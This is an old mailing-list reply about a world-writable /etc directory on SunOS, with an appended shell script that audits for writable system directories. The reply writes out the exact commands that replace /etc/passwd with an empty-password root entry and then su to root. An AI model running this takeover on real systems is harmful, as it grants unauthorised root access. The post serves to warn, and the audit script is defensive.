From: "Crist J. Clark"
Message-Id: <199812180418.XAA17904@cc942873-a.ewndsr1.nj.home.com>
Subject: Re: Basic Security Question
In-Reply-To: <3678D0CF.7FA8B106@uk.radan.com> from Mark Ovens at "Dec 17, 98 09:37:19 am"
To: marko@uk.radan.com (Mark Ovens)
Date: Thu, 17 Dec 1998 22:04:04 -0500 (EST)
Reply-To: cjclark@home.com

Mark Ovens wrote,
> and on all the Sparcs running SunOS4.1.3_U1 here are:
>
> gppsun4:/{8}% ls -ldug etc
> drwxrwsrwx 10 bin staff 2048 Dec 17 09:30 etc
>
> which is even less secure as it's writable by all!

I may be dense. Is that some kind of joke or something? As dense as I
am, I know for sure that even I could take any account on a system
with permissions like that and have control of root in this many
keystrokes:

  % cd /etc
  % echo "root::0:0:Evil Root:/:/bin/csh" > passwd.new
  % mv passwd passwd.old
  % mv passwd.new passwd
  % su
  # BUWHAHAHA!

--
Crist J. Clark                           cjclark@home.com
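An audit for the condition discussed in this message, as an added example that is not part of the original post. The function names `dir_replace_risk` and `audit_dirs` are hypothetical; the check classifies a directory by who can rename or unlink its entries, since write permission on the directory, not on the file inside it, decides that.

```shell
#!/bin/sh
# Added example (not from the original post): report directories whose
# entries can be replaced by users other than the owner.
# Write permission on a directory allows rename/unlink of its entries,
# whatever the mode of the entries themselves.

# dir_replace_risk DIR  (hypothetical helper) prints one of:
#   world-writable         any local user can swap entries (e.g. drwxrwsrwx)
#   world-writable-sticky  others can create entries, but the sticky bit
#                          stops them renaming/unlinking files they do not own
#   group-writable         members of the owning group can swap entries
#   ok                     only the owner can modify the directory
dir_replace_risk() {
    d=$1
    [ -d "$d" ] || { echo "not-a-directory"; return 2; }
    # -H follows a symlink given on the command line (e.g. /bin -> usr/bin);
    # -prune tests only the directory itself, not its contents.
    if [ -n "$(find -H "$d" -prune -perm -0002 ! -perm -1000)" ]; then
        echo "world-writable"
    elif [ -n "$(find -H "$d" -prune -perm -0002)" ]; then
        echo "world-writable-sticky"
    elif [ -n "$(find -H "$d" -prune -perm -0020)" ]; then
        echo "group-writable"
    else
        echo "ok"
    fi
}

# audit_dirs DIR...  (hypothetical helper) prints "RISK<TAB>ls -ld line" for
# every directory that is not "ok"; returns 1 if there was any finding.
audit_dirs() {
    rc=0
    for d in "$@"; do
        r=$(dir_replace_risk "$d") || continue
        [ "$r" = "ok" ] && continue
        printf '%s\t%s\n' "$r" "$(ls -ld "$d")"
        rc=1
    done
    return $rc
}

# Typical use on system directories:
#   audit_dirs / /etc /bin /sbin /usr /usr/bin /usr/sbin
```

A `group-writable` finding is only a problem when the owning group has members who should not be able to change the directory, so review those against the group's membership.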